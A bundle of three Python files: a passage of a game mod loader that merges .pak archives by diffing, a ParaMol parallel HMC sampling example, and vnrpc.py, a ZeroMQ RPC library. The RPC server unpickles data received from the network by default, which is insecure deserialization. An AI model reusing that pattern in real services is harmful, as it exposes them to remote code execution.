sequence = difflib.SequenceMatcher(isjunk=None, a=str1, b=str2)
difference = sequence.ratio()*100
difference = round( difference, 1 )
return difference
def most_similar_to(self, str, list):
''' returns the index of the element in a list that is most similar to string '''
how_similar_most_similar_line_is = -1
most_similar_line_index = -1
for i in range( len( list ) ):
similarity = self.similarity( str, list[i] )
if similarity > how_similar_most_similar_line_is:
how_similar_most_similar_line_is = similarity
most_similar_line_index = i
if most_similar_line_index < 0:
plog( 'Something went terribly wrong in; DiffCombiner.most_similar_to(str, list).'\
'Please remove \'{0}\' from mods folder and file a bug report on nexus mods.'\
'Please remember to include your \'logs\' folder located in {1}.'.format( self.mod_pak_name, self.log_folder_path ) )
plog( 'most_similar_line_index = {0}.\nstr = {1}\nfile = {2}'.format( most_similar_line_index,
str,
self.mod_file.filepath ), level=logging.DEBUG )
input('Press Enter/Return to close...')
assert False
return most_similar_line_index
def find_top_matching_lines( self, line, file ):
similarities = [ {
'how_similar': -1,
'index': None
} ]
for i in range( len( file ) ):
similarity = self.similarity( line, file[ i ] )
if similarity >= similarities[ 0 ][ 'how_similar' ]:
similarities.insert( 0 ,
{
'how_similar': similarity,
'index': i
} )
if len( similarities ) > self.accuracy:
similarities.pop( -1 )
return similarities
def compare_areas( self, area1, area2 ):
if len(area1) != len(area2):
assert False, 'len( area1 ) and len( area2 ) must be of same size.'
similarities_list = [ ]
for i in range( len( area1 ) ):
similarities_list.append( self.similarity( area1[ i ], area2[ i ] ) )
return sum( similarities_list )
def most_similar_area( self, area, file ):
area_size = len( area )
if area_size % 2 != 1:
assert False, 'len( area ) MUST be odd.'
line = area[ math.floor( area_size/2 ) ]
top_matches = self.find_top_matching_lines( line, file )
best_area = {
'how_similar': -1,
'index': -1
}
for i in range( len( top_matches ) ):
match = top_matches[ i ]
match_line_number = match[ 'index' ]
if match_line_number is not None:
match_area = self.get_area( len( area ), file, match[ 'index' ] )
comp = self.compare_areas( area, match_area )
if comp >= best_area[ 'how_similar' ]:
best_area[ 'how_similar' ] = comp
best_area[ 'index' ] = match_line_number
return best_area[ 'index' ]
''' Takes an even length list of lines as area and another list of lines as file returns the middle point'''
'''
how_similar_most_similar_area_is = -1
most_similar_area_center_line_index = -1
if len(area) % 2 == 0:
plog( 'Something went terribly wrong in; DiffCombiner.most_similar_area(area, file), len(area) is even? what?'
'Please remove \'{0}\' from mods folder and file a bug report on nexus mods including:'\
'Please remember to include your \'logs\' folder located in {1}.'.format( self.mod_pak_name, self.log_folder_path ) )
plog( 'area = {0}.\file = {1}'.format( area, self.mod_file.filepath ), level=logging.DEBUG )
input('Press Enter/Return to close...')
assert False
for _ in range( math.floor( len(area)/2 ) ):
file.insert(0, ' ')
for _ in range( math.floor( len(area)/2 ) ):
file.append(' ')
for i in range(math.floor( len(area)/2 )+1, len(file) ):
diff_perc = [ -1 for _ in range( len( area ) ) ]
for line in file:
for j in range( len( area ) ):
aline = area[ j ]
diff_perc[ j ] = self.similarity(aline, line)
for j in range( 1, len( diff_perc ) ):
diff_perc[0] += diff_perc[ j ]
if diff_perc[0] > how_similar_most_similar_area_is:
how_similar_most_similar_area_is = diff_perc[0]
most_similar_area_center_line_index = i - math.floor( len(area)/2 )
return most_similar_area_center_line_index
'''
def get_area( self, area_size, file, line_number ):
file = file[:]
if area_size % 2 != 1:
assert False, 'area_size MUST be odd'
for _ in range( math.floor( area_size/2 )+1 ):
file.insert(0, ' ')
line_number += 1
for _ in range( math.floor( area_size/2 )+1 ):
file.append(' ')
area = []
for i in range( line_number - math.floor( area_size/2 ), line_number + math.floor( area_size/2 )+1 ):
area.append( file[ i ] )
return area
def combine(self):
diff_file = self.diffs_to_folder()
if self.omni_mod_file:
new_file = self.omni_mod_file
else:
new_file = self.original_file
diff = diff_file.split( '\n' )
new = new_file.split( '\n' )
omni = self.omni_mod_file.split( '\n' )
orig = self.original_file.split( '\n' )
mod = self.mod_file.contents.split( '\n' )
diff_blocks = [ ]
for i in range( len( diff ) ):
line = diff[ i ]
try:
next_line = diff[ i+1 ]
except IndexError:
next_line = ' '
if line and ( line[ 0 ] == '-' or line[ 0 ] == '+' ):
line = [ char for char in line ]
instruction = line[ 0 ]
for i in range(2):
line.pop( 0 )
line = ''.join( line )
diff_blocks.append(
{ 'line_number': i, 'line': line, 'instruction': instruction, 'details': None }
)
if next_line and next_line[ 0 ] == '?':
for i in range(2):
next_line = pop_str( next_line, 0 )
diff_blocks[ -1 ][ 'details' ] = next_line
for i in range( len( diff_blocks ) ):
block = diff_blocks[ i ]
bline = block[ 'line' ]
bline_number = block[ 'line_number' ]
instruction = block[ 'instruction' ]
details = block[ 'details' ]
if instruction == '-':
orig_area = self.get_area( self.area_size, orig, orig.index( bline ) )
olinei = self.most_similar_area( orig_area, new )
new.pop( olinei )
elif instruction == '+':
mod_area = self.get_area( self.area_size, mod, mod.index( bline ) )
mlinei = self.most_similar_area( mod_area, new )
new.insert( mlinei, bline )
return '\n'.join( new )
class PakFile( zipfile.ZipFile ):
def open(self, name, mode="r", pwd=None):
"""Return file-like object for 'name'."""
if mode not in ("r", "U", "rU"):
raise RuntimeError('open() requires mode "r", "U", or "rU"')
if 'U' in mode:
import warnings
warnings.warn("'U' mode is deprecated",
DeprecationWarning, 2)
if pwd and not isinstance(pwd, bytes):
raise TypeError("pwd: expected bytes, got %s" % type(pwd))
if not self.fp:
raise RuntimeError(
"Attempt to read ZIP archive that was already closed")
# Make sure we have an info object
if isinstance(name, zipfile.ZipInfo):
# 'name' is already an info object
zinfo = name
else:
# Get info object for name
zinfo = self.getinfo(name)
self._fileRefCnt += 1
zef_file = zipfile._SharedFile(self.fp, zinfo.header_offset, self._fpclose, self._lock)
try:
# Skip the file header:
fheader = zef_file.read(zipfile.sizeFileHeader)
if len(fheader) != zipfile.sizeFileHeader:
raise zipfile.BadZipFile("Truncated file header")
fheader = struct.unpack(zipfile.structFileHeader, fheader)
if fheader[zipfile._FH_SIGNATURE] != zipfile.stringFileHeader:
raise zipfile.BadZipFile("Bad magic number for file header")
fname = zef_file.read(fheader[zipfile._FH_FILENAME_LENGTH])
if fheader[zipfile._FH_EXTRA_FIELD_LENGTH]:
zef_file.read(fheader[zipfile._FH_EXTRA_FIELD_LENGTH])
if zinfo.flag_bits & 0x20:
# Zip 2.7: compressed patched data
raise NotImplementedError("compressed patched data (flag bit 5)")
if zinfo.flag_bits & 0x40:
# strong encryption
raise NotImplementedError("strong encryption (flag bit 6)")
if zinfo.flag_bits & 0x800:
# UTF-8 filename
fname_str = fname.decode("utf-8")
else:
fname_str = fname.decode("cp437")
fname_str = '/'.join(fname_str.split('\\'))
if fname_str != zinfo.orig_filename:
raise zipfile.BadZipFile(
'File name in directory %r and header %r differ.'
% (zinfo.orig_filename, fname_str))
# check for encrypted flag & handle password
is_encrypted = zinfo.flag_bits & 0x1
zd = None
if is_encrypted:
if not pwd:
pwd = self.pwd
if not pwd:
raise RuntimeError("File %s is encrypted, password "
"required for extraction" % name)
zd = zipfile._ZipDecrypter(pwd)
# The first 12 bytes in the cypher stream is an encryption header
# used to strengthen the algorithm. The first 11 bytes are
# completely random, while the 12th contains the MSB of the CRC,
# or the MSB of the file time depending on the header type
# and is used to check the correctness of the password.
header = zef_file.read(12)
h = list(map(zd, header[0:12]))
if zinfo.flag_bits & 0x8:
# compare against the file type from extended local headers
check_byte = (zinfo._raw_time >> 8) & 0xff
else:
# compare against the CRC otherwise
check_byte = (zinfo.CRC >> 24) & 0xff
if h[11] != check_byte:
raise RuntimeError("Bad password for file", name)
return zipfile.ZipExtFile(zef_file, mode, zinfo, zd, True)
except:
zef_file.close()
raise
class FileContentsElement( object ):
def __init__( self, value ):
self.value = value
def __repr__( self ):
return str( self.value )
class FileContents( list ):
def __init__( self, items ):
for item in self.items:
self.append( item )
def append(self, value):
list.append( self, FileContentsElement( value ) )
def __setitem__(self, index, value):
list.__setitem__( self, index, FileContentsElement( value ) )
class File( object ):
def __init__(self, filepath, contents, zip_path = None):
self.filepath = filepath
self.ext = self.filepath.split( '.' )[-1]
if os.path.isdir(self.filepath):
if self.filepath[-1] != os.sep:
self.filepath += os.sep
self.contents = sorted( os.listdir( self.filepath ) )
else:
self.contents = contents if self.ext != 'tbl' else ''
self.zip_path = zip_path
@property
def contents(self):
return self._contents
@contents.setter
def contents(self, value):
self._contents = value
def __repr__(self):
return 'FileObject: {0}'.format( self.filepath )
class Pak( object ):
def __init__(self, zip_path):
self.zip_path = zip_path
if not os.path.isfile( self.zip_path ):
ezip = b'PK\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
with open(self.zip_path, 'wb') as zip:
zip.write(ezip)
self.zip = PakFile( self.zip_path )
self.files = []
for member in self.zip.infolist():
if '.' in member.filename:
if member.filename[-4:] != '.tbl':
file_contents = self.zip.open( member.filename, 'r' )
file_contents = file_contents.readlines()
try:
if type( file_contents[0] ) == type( b'' ):
file_contents = b''.join( file_contents ).decode('latin-1')
else:
file_contents = ''.join( file_contents )
except IndexError:
file_contents = ''
else:
file_contents = ''
self.files.append( File( member.filename, file_contents, self.zip_path ) )
self.zip.close()
def __repr__(self):
str_list = []
str_list.append( ' ')
str_list.append(self.zip_path)
str_list.append( '---' + self.zip_path )
for file in self.files:
str_list.append( ' ' + str(file) )
str_list.append('---')
return '\n'.join(str_list)
def write(self, filename = None):
if filename == None:
filename = self.zip_path
new_zip = PakFile(self.zip_path, 'w')
for file in self.files:
file_contents = file.contents
try:
if type( file_contents[0] ) == type( b'' ):
file_contents = b''.join( file_contents ).decode('latin-1')
else:
file_contents = ''.join( file_contents )
except IndexError:
file_contents = ''
new_zip.writestr( file.filepath, file_contents )
new_zip.close()
class QuickPak( object ):
def __init__(self, zip_path):
self.zip_path = zip_path
if not os.path.isfile( self.zip_path ):
ezip = b'PK\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
with open(self.zip_path, 'wb') as zip:
zip.write(ezip)
self.zip = PakFile( self.zip_path )
self.quick_folders = []
self.quick_folder_level = 3
for member in self.zip.infolist():
if '.' in member.filename:
quick_folder = member.filename.split('/')[ 0:self.quick_folder_level ]
for i in range( -1, len( quick_folder ), -1 ):
if '.' in quick_folder[i]:
quick_folder.pop( i )
quick_folder = '/'.join( quick_folder )
if quick_folder and quick_folder not in self.quick_folders:
self.quick_folders.append( quick_folder )
class Manager( object ):
def __init__(self, game_files_filepath, mod_files_filepath, diff_report_folder, log_folder_path, load_order_path):
self.mod_files_filepath = mod_files_filepath
if self.mod_files_filepath[-1] != os.sep:
self.mod_files_filepath += os.sep
if not os.path.exists(self.mod_files_filepath):
os.makedirs(self.mod_files_filepath)
self.game_files_filepath = game_files_filepath
if self.game_files_filepath[-1] != os.sep:
self.game_files_filepath += os.sep
self.diff_report_folder = diff_report_folder
if self.diff_report_folder[-1] != os.sep:
self.diff_report_folder += os.sep
self.log_folder_path = log_folder_path
if self.log_folder_path[-1] != os.sep:
self.log_folder_path += os.sep
self.load_order_path = load_order_path
self.omni_mod_name = 'zzz_simple_mod_loader.pak'
self.omni_mod_path = self.game_files_filepath + self.omni_mod_name
self.lightning_search_dict = {
'Libs/Tables/rpg': [self.game_files_filepath + 'Tables.pak'],
'Libs/UI/UIActions': [self.game_files_filepath + 'GameData.pak']
}
self.quick_search_dict ={}
self.non_mergeable_types = [ 'tbl', 'dds' ]
self.mod_pak_paths = []
self.original_game_pak_paths = []
def populate_paks(self, sort = True):
self._populate_mod_pak_paths()
self._populate_original_game_pak_paths()
self._populate_quick_search()
if sort:
self._sort_mods_by_load_order()
def _file_to_pak(self, filepath, make_quick_pak = False):
pak = None
if( filepath[-4:] == '.pak' ):
if make_quick_pak:
pak = QuickPak( filepath )
else:
pak = Pak( filepath )
elif( filepath[-4:] == '.zip' ):
#TODO: if user.cfg is in the zip file; append contents to user.cfg
#TODO: if bin in zip file; go looking for user.cfg in bin/Win64
#TODO: if Localization is in .zip file; do localization stuff...
#TODO: if Data is in .zip file; recursively call '_populate_mod_paks' on the new "Data" folder.
#TODO: if Engine is in .zip file; recursively call '_populate_mod_paks' on Engine folder.
#TODO: if .pak is in .zip file; load in the .pak file.
pass
return pak
def _populate_mod_pak_paths(self):
plog('Getting mod paks.')
for filename in os.listdir( self.mod_files_filepath ):
if filename[-4:] == '.pak' or filename[-4:] == '.zip':
self.mod_pak_paths.append( self.mod_files_filepath + filename )
def _populate_original_game_pak_paths(self):
plog('Getting necessary game files.')
def get_all_game_pak_paths( fp = None ):
if fp == None:
fp = self.game_files_filepath
if fp[-1] != os.sep:
fp += os.sep
paks = []
for pak in os.listdir( fp ):
if os.path.isdir( fp + pak ):
#Recursively get all .pak files in the game files.
for gotten_pak in get_all_game_pak_paths( fp + pak ):
paks.append( gotten_pak )
elif '.pak' in pak and pak[0].lower() != 'z':
paks.append( fp + pak )
return paks
pak_paths = get_all_game_pak_paths()
needed_files = []
for filename in os.listdir( self.mod_files_filepath ):
if filename[-4:] == '.pak' or filename[-4:] == '.zip':
mod_pak = self._file_to_pak( self.mod_files_filepath + filename )
for file in mod_pak.files:
if file.filepath not in needed_files:
needed_files.append( file.filepath.lower() )
for pak_path in pak_paths:
if pak_path != self.omni_mod_path:
pak = PakFile( pak_path )
for member in pak.infolist():
if member.filename.lower() in needed_files:
self.original_game_pak_paths.append( pak_path )
pak.close()
def _populate_quick_search(self):
plog('Initializing Quick Search')
for original_game_pak_filepath in self.original_game_pak_paths:
original_game_pak = self._file_to_pak( original_game_pak_filepath, make_quick_pak = True )
for folder in original_game_pak.quick_folders:
if folder not in self.quick_search_dict.items():
self.quick_search_dict[ folder ] = [ ]
self.quick_search_dict[ folder ].append( original_game_pak.zip_path )
def search( self, filepath, search_dict ):
quick_folder = '/'.join( filepath.split('/')[ 0:3 ] )
for path, paks in search_dict.items():
if path == quick_folder:
return paks
return None
def lightning_search(self, filepath):
plog( ' Performing Lightning Search for Pak Containing File: {0}'.format( filepath ) )
result = self.search( filepath, self.lightning_search_dict )
if result:
plog( ' Lightning Search Found Pak File.' )
plog( ' Looking for {0} in Pak File.'.format( filepath ) )
else:
plog( ' Lightning Search Failed.' )
return result
def quick_search(self, filepath):
plog( ' Performing Quick Search for Pak Containing File: {0}'.format( filepath ) )
result = self.search( filepath, self.quick_search_dict )
if result:
plog( ' Quick Search Found Pak File.' )
plog( ' Looking for {0} in Pak File.'.format( filepath ) )
else:
plog( ' Quick Search Failed.' )
return result
def make_omnipak(self):
plog('')
plog( '~=Building omni-mod=~' )
plog( 'This may take awhile. Go get a snack and make some coffee.' )
#Cleanup old omni-mod and create new one.
if os.path.exists(self.omni_mod_path):
os.remove(self.omni_mod_path)
omni_mod = Pak( self.omni_mod_path )
#Cleanup report diffs folder.
for file in os.listdir(self.diff_report_folder):
os.remove(self.diff_report_folder + file)
#Iterate over all mods in the mods folder.
for mod_pak_filepath in self.mod_pak_paths:
plog('')
plog( 'Loading New Mod: {0}'.format( mod_pak_filepath ) )
mod_pak = self._file_to_pak( mod_pak_filepath )
for mod_pak_file_index in range( len( mod_pak.files ) ):
mod_file = mod_pak.files[ mod_pak_file_index ]
if mod_file.ext not in self.non_mergeable_types:
original_game_pak_paths = self.lightning_search( mod_file.filepath ) or self.quick_search( mod_file.filepath )
mod_file_in_omni_mod = False
for original_game_pak_filepath in original_game_pak_paths:
original_game_pak = self._file_to_pak( original_game_pak_filepath )
plog( ' Searching in Game Pak: {0}'.format( original_game_pak.zip_path ) )
for original_game_file in original_game_pak.files:
if mod_file.filepath.lower() == original_game_file.filepath.lower():
plog( ' Found Game File.' )
plog('')
plog( ' Searching Omni-Mod for: {0}'.format( mod_file.filepath ) )
for omni_mod_file_index in range( len( omni_mod.files ) ):
omni_mod_file = omni_mod.files[ omni_mod_file_index ]
if ( mod_file.filepath.lower() == omni_mod_file.filepath.lower() ):
plog( ' Found Duplicate.' )
plog('')
mod_file_in_omni_mod = True
omni_mod.files[ omni_mod_file_index ] = self._merge_files( original_game_file, omni_mod_file, mod_file, mod_pak.zip_path )
break
if mod_file_in_omni_mod:
break
if mod_file_in_omni_mod:
break
if mod_file_in_omni_mod:
break
if not mod_file_in_omni_mod:
plog( ' Creating New File in Omni-Mod: {0}'.format( mod_file.filepath ) )
new_file = mod_file
new_file.filepath = new_file.filepath.lower()
omni_mod.files.append( new_file )
else:
plog( ' Handling non-mergeable filetype: {0}'.format( mod_file.filepath ) )
mod_file_in_omni_mod = False
for omni_mod_file_index in range( len( omni_mod.files ) ):
omni_mod_file = omni_mod.files[ omni_mod_file_index ]
if mod_file.filepath.lower() == omni_mod_file.filepath.lower():
plog( ' File already exists in Omni-Mod. Replacing file.' )
plog('')
mod_file_in_omni_mod = True
new_file = mod_file
new_file.filepath = new_file.filepath.lower()
omni_mod.files[ omni_mod_file_index ] = new_file
break
if not mod_file_in_omni_mod:
plog( ' Creating New File in Omni-Mod: {0}'.format( mod_file.filepath ) )
plog('')
new_file = mod_file
new_file.filepath = new_file.filepath.lower()
omni_mod.files.append( new_file )
omni_mod.write()
def _merge_files(self, original_game_file, omni_mod_file, mod_file, mod_pak_name):
new_file = File( original_game_file.filepath, omni_mod_file.contents )
plog( ' Merging in Mod File: {0}'.format( mod_file.filepath ) )
#TODO: Move accuracy and area out to a config file;
accuracy = 10
area_size = 5
new_file.contents = DiffCombiner( self.diff_report_folder,
original_game_file,
mod_file,
omni_mod_file,
mod_pak_name,
self.log_folder_path,
accuracy,
area_size ).combine()
return new_file
def _sort_mods_by_load_order(self):
plog('Sorting mods by load order')
mod_pak_paths = self.mod_pak_paths[:]
sorted_list = []
try:
with open(self.load_order_path, 'r') as load_order:
load_order = load_order.read().splitlines()
except FileNotFoundError:
with open(self.load_order_path, 'w') as load_order:
file = os.listdir( self.mod_files_filepath )
file_map = []
for filename in file[:]:
if filename[-4:] == '.pak' or filename[-4:] == '.zip':
file_map.append(filename)
load_order.write( '\n'.join( file_map ) )
with open(self.load_order_path, 'r') as load_order:
load_order = load_order.read().splitlines()
for load_order_list_element in load_order:
found_mod = False
for mod_pak_path in mod_pak_paths[:]:
if mod_pak_path == self.mod_files_filepath + load_order_list_element:
found_mod = True
sorted_list.append( mod_pak_paths.pop( mod_pak_paths.index(mod_pak_path) ) )
break
if not found_mod:
plog("Warning! Mod in load_order file but not in mods folder. Please delete load_order file after adding or removing mods.")
if mod_pak_paths:
plog("Warning! Mods in mods folder but not in load order file. Please delete load_order file after adding or removing mods.")
for _ in range( len( mod_pak_paths[:] ) ):
sorted_list.insert(0, mod_pak_paths.pop( 0 ) )
self.mod_pak_paths = sorted_list
def _get_paths( exe ):
log_folder_path = os.path.dirname( os.path.abspath('__file__') ) + os.sep + 'logs' + os.sep
init_plog( log_folder_path )
plog( 'exe_path = {0}'.format(exe), level=logging.DEBUG )
path_list = exe.split(os.sep)
path_list.pop()
path_list.append( 'user.cfg' )
usercfg = os.sep.join(path_list)
for i in range(3):
path_list.pop()
path_list.append('Data')
data_path = os.sep.join(path_list)
path_list.pop()
path_list.append('Localization')
localization_path = os.sep.join(path_list)
mods_path = os.path.dirname( os.path.realpath('__file__') ) + os.sep + 'mods' + os.sep
plog( 'included mods:', level=logging.DEBUG )
if not os.path.exists(mods_path):
os.makedirs(mods_path)
for mod in os.listdir( mods_path ):
plog( ' {0}'.format(mod), level=logging.DEBUG )
diff_report_folder_path = os.path.dirname( os.path.realpath('__file__') ) + os.sep + 'diff_reports' + os.sep
if not os.path.exists(diff_report_folder_path):
os.makedirs(diff_report_folder_path)
load_order_path = os.path.dirname( os.path.realpath('__file__') ) + os.sep + 'load_order.txt'
plog('load order:', level=logging.DEBUG)
if os.path.isfile(load_order_path):
with open(load_order_path, 'r') as load_order:
for line in load_order.read().splitlines():
plog(' {0}'.format( line ), level=logging.DEBUG)
else:
plog(' No load order file', level=logging.DEBUG)
return usercfg, data_path, localization_path, mods_path, diff_report_folder_path, log_folder_path, load_order_path
def play_loading_anim( started ):
global PLAYANIM
anim = [ '\\', '|', '/', '-' ]
PLAYANIM = True
while PLAYANIM:
for x in range( len(anim) ):
print ( 'Loading{0} Elapsed Time - {1} - Please allow up to 5 minutes for each mod.\r'.format( anim[ x ], datetime.datetime.now()-started, ), end='' )
time.sleep(0.3)
print(' '*100)
if __name__ == '__main__':
started = datetime.datetime.now()
with open('config', 'r') as file:
file = file.read().split('\n')
for line in file:
line = line.split('=')
if line[0] == 'exe_path':
exe = line[1]
#TODO: Make a server and ask the user if it's ok to send us data with 'add data is anonymous blah blah blah', if yes; on exception; send logfiles to server.
sys.excepthook = lambda *exc_info : plog( 'Exception raised:\n{0}'.format( ''.join(traceback.format_exception(*exc_info) ) ), level=logging.ERROR )
usercfg, data_path, localization_path, mods_path, diff_report_folder_path, log_folder_path, load_order_path = _get_paths(exe)
loading_anim_thread = threading.Thread( target=play_loading_anim, args = ( started, ) )
if not os.path.isfile( os.path.dirname( os.path.abspath('__file__') ) + os.sep + '.gitignore' ):
loading_anim_thread.start()
manager = Manager( data_path, mods_path, diff_report_folder_path, log_folder_path, load_order_path )
manager.populate_paks()
manager.make_omnipak()
PLAYANIM = False
try:
loading_anim_thread.join()
except RuntimeError:
pass
plog( 'Elapsed Time - {0}'.format( datetime.datetime.now() - started ) )
plog( 'Successfully Loaded All Mods' )
input( 'Press Enter/Return to close...' )
|
example_8_parallel.py
|
import simtk.unit as unit
import multiprocessing as mp
# ParaMol imports
from ParaMol.System.system import *
# ParaMol Tasks imports
from ParaMol.HMC.hmc_sampler import *
from ParaMol.Utils.settings import *
# --------------------------------------------------------- #
# Preparation #
# --------------------------------------------------------- #
system_names = ["aniline_{}".format(i) for i in range(4)]
systems = []
# Create four identical aniline systems
for name in system_names:
# Create the OpenMM engine for aniline
openmm_system = OpenMMEngine(init_openmm=True, topology_format='AMBER', top_file='aniline.prmtop', crd_format="AMBER", crd_file='aniline.inpcrd')
# Create ParaMol System
systems.append(ParaMolSystem(name=name, engine=openmm_system, n_atoms=14))
# Create ParaMol settings instance
paramol_settings = Settings()
# --------------------------------------------------------- #
# Set the QM Engine #
# --------------------------------------------------------- #
# Create the ASE calculator
from ase.calculators.dftb import *
calc = Dftb(Hamiltonian_='DFTB', # line is included by default
Hamiltonian_MaxSCCIterations=1000,
Hamiltonian_MaxAngularMomentum_='',
Hamiltonian_MaxAngularMomentum_H='s',
Hamiltonian_MaxAngularMomentum_C='p',
Hamiltonian_MaxAngularMomentum_N="p",
Hamiltonian_Dispersion="DftD3 { \n s6=1.000 \n s8=0.5883 \n Damping = BeckeJohnson { \n a1=0.5719 \n a2=3.6017 \n } \n }",
Hamiltonian_SCC='Yes',
Hamiltonian_SCCTolerance=1e-8, )
# Set the calculator in the settings
paramol_settings.qm_engine["ase"]["calculator"] = calc
# -------------------------------------------------------------- #
# Perform the nMC-MC Parallel Sampling #
# -------------------------------------------------------------- #
HMC_samplers = [HMCSampler() for n in range(len(systems))]
output = mp.Queue()
processes_pool = []
for system, sampler in zip(systems, HMC_samplers):
hmc_kwargs = {"settings": paramol_settings,
"systems": [system],
"n_sweeps": 10000,
"n_steps_per_sweep": 100,
"temperature_pot_qm": unit.Quantity(300, unit.kelvin),
"temperature_pot_mm": unit.Quantity(300, unit.kelvin),
"temperature_kin_mm": unit.Quantity(300, unit.kelvin)}
processes_pool.append(mp.Process(target=sampler.run_task, kwargs=hmc_kwargs))
# Run processes
for sampler, system in zip(processes_pool, systems):
print("Starting HMC sampler of system {}".format(system.name))
sampler.start()
# Exit the completed processes
for sampler in processes_pool:
sampler.join()
# Write final data into file
for system in systems:
system.write_data()
|
vnrpc.py
|
# encoding: UTF-8
import threading
import traceback
import signal
import zmq
from msgpack import packb, unpackb
from json import dumps, loads
import pickle
pDumps = pickle.dumps
pLoads = pickle.loads
# 实现Ctrl-c中断recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
########################################################################
class RpcObject(object):
"""
RPC对象
提供对数据的序列化打包和解包接口,目前提供了json、msgpack、cPickle三种工具。
msgpack:性能更高,但通常需要安装msgpack相关工具;
json:性能略低但通用性更好,大部分编程语言都内置了相关的库。
cPickle:性能一般且仅能用于Python,但是可以直接传送Python对象,非常方便。
因此建议尽量使用msgpack,如果要和某些语言通讯没有提供msgpack时再使用json,
当传送的数据包含很多自定义的Python对象时建议使用cPickle。
如果希望使用其他的序列化工具也可以在这里添加。
"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
# 默认使用msgpack作为序列化工具
#self.useMsgpack()
self.usePickle()
#----------------------------------------------------------------------
def pack(self, data):
"""打包"""
pass
#----------------------------------------------------------------------
def unpack(self, data):
"""解包"""
pass
#----------------------------------------------------------------------
def __jsonPack(self, data):
"""使用json打包"""
return dumps(data)
#----------------------------------------------------------------------
def __jsonUnpack(self, data):
"""使用json解包"""
return loads(data)
#----------------------------------------------------------------------
def __msgpackPack(self, data):
"""使用msgpack打包"""
return packb(data)
#----------------------------------------------------------------------
def __msgpackUnpack(self, data):
"""使用msgpack解包"""
return unpackb(data)
#----------------------------------------------------------------------
def __picklePack(self, data):
"""使用cPickle打包"""
return pDumps(data)
#----------------------------------------------------------------------
def __pickleUnpack(self, data):
"""使用cPickle解包"""
return pLoads(data)
#----------------------------------------------------------------------
def useJson(self):
"""使用json作为序列化工具"""
self.pack = self.__jsonPack
self.unpack = self.__jsonUnpack
#----------------------------------------------------------------------
def useMsgpack(self):
"""使用msgpack作为序列化工具"""
self.pack = self.__msgpackPack
self.unpack = self.__msgpackUnpack
#----------------------------------------------------------------------
def usePickle(self):
"""使用cPickle作为序列化工具"""
self.pack = self.__picklePack
self.unpack = self.__pickleUnpack
########################################################################
class RpcServer(RpcObject):
"""RPC服务器"""
#----------------------------------------------------------------------
def __init__(self, repAddress, pubAddress):
"""Constructor"""
super(RpcServer, self).__init__()
# 保存功能函数的字典,key是函数名,value是函数对象
self.__functions = {}
# zmq端口相关
self.__context = zmq.Context()
self.__socketREP = self.__context.socket(zmq.REP) # 请求回应socket
self.__socketREP.bind(repAddress)
self.__socketPUB = self.__context.socket(zmq.PUB) # 数据广播socket
self.__socketPUB.bind(pubAddress)
# 工作线程相关
self.__active = False # 服务器的工作状态
self.__thread = threading.Thread(target=self.run) # 服务器的工作线程
#----------------------------------------------------------------------
def start(self):
"""启动服务器"""
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止服务器"""
# 将服务器设为停止
self.__active = False
# 等待工作线程退出
if self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""服务器运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketREP.poll(1000):
continue
# 从请求响应socket收取请求数据
reqb = self.__socketREP.recv()
# 序列化解包
req = self.unpack(reqb)
# 获取函数名和参数
name, args, kwargs = req
# 获取引擎中对应的函数对象,并执行调用,如果有异常则捕捉后返回
try:
func = self.__functions[name]
r = func(*args, **kwargs)
rep = [True, r]
except Exception as e:
rep = [False, traceback.format_exc()]
# 序列化打包
repb = self.pack(rep)
# 通过请求响应socket返回调用结果
self.__socketREP.send(repb)
#----------------------------------------------------------------------
def publish(self, topic, data):
"""
广播推送数据
topic:主题内容(注意必须是ascii编码)
data:具体的数据
"""
# 序列化数据
datab = self.pack(data)
# 通过广播socket发送数据
self.__socketPUB.send_multipart([topic, datab])
#----------------------------------------------------------------------
def register(self, func):
"""注册函数"""
self.__functions[func.__name__] = func
########################################################################
class RpcClient(RpcObject):
"""RPC客户端"""
#----------------------------------------------------------------------
def __init__(self, reqAddress, subAddress):
"""Constructor"""
super(RpcClient, self).__init__()
# zmq端口相关
self.__reqAddress = reqAddress
self.__subAddress = subAddress
self.__context = zmq.Context()
self.__socketREQ = self.__context.socket(zmq.REQ) # 请求发出socket
self.__socketSUB = self.__context.socket(zmq.SUB) # 广播订阅socket
# 工作线程相关,用于处理服务器推送的数据
self.__active = False # 客户端的工作状态
self.__thread = threading.Thread(target=self.run) # 客户端的工作线程
#----------------------------------------------------------------------
def __getattr__(self, name):
"""实现远程调用功能"""
# 执行远程调用任务
def dorpc(*args, **kwargs):
# 生成请求
req = [name, args, kwargs]
# 序列化打包请求
reqb = self.pack(req)
# 发送请求并等待回应
self.__socketREQ.send(reqb)
repb = self.__socketREQ.recv()
# 序列化解包回应
rep = self.unpack(repb)
# 若正常则返回结果,调用失败则触发异常
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
#----------------------------------------------------------------------
def start(self):
"""启动客户端"""
# 连接端口
self.__socketREQ.connect(self.__reqAddress)
self.__socketSUB.connect(self.__subAddress)
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止客户端"""
# 将客户端设为停止
self.__active = False
# 等待工作线程退出
if self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""客户端运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketSUB.poll(1000):
continue
# 从订阅socket收取广播数据
topic, datab = self.__socketSUB.recv_multipart()
# 序列化解包
data = self.unpack(datab)
# 调用回调函数处理
self.callback(topic, data)
#----------------------------------------------------------------------
def callback(self, topic, data):
"""回调函数,必须由用户实现"""
raise NotImplementedError
#----------------------------------------------------------------------
def subscribeTopic(self, topic):
"""
订阅特定主题的广播数据
可以使用topic=''来订阅所有的主题
注意topic必须是ascii编码
"""
self.__socketSUB.setsockopt(zmq.SUBSCRIBE, topic)
########################################################################
class RemoteException(Exception):
"""RPC远程异常"""
#----------------------------------------------------------------------
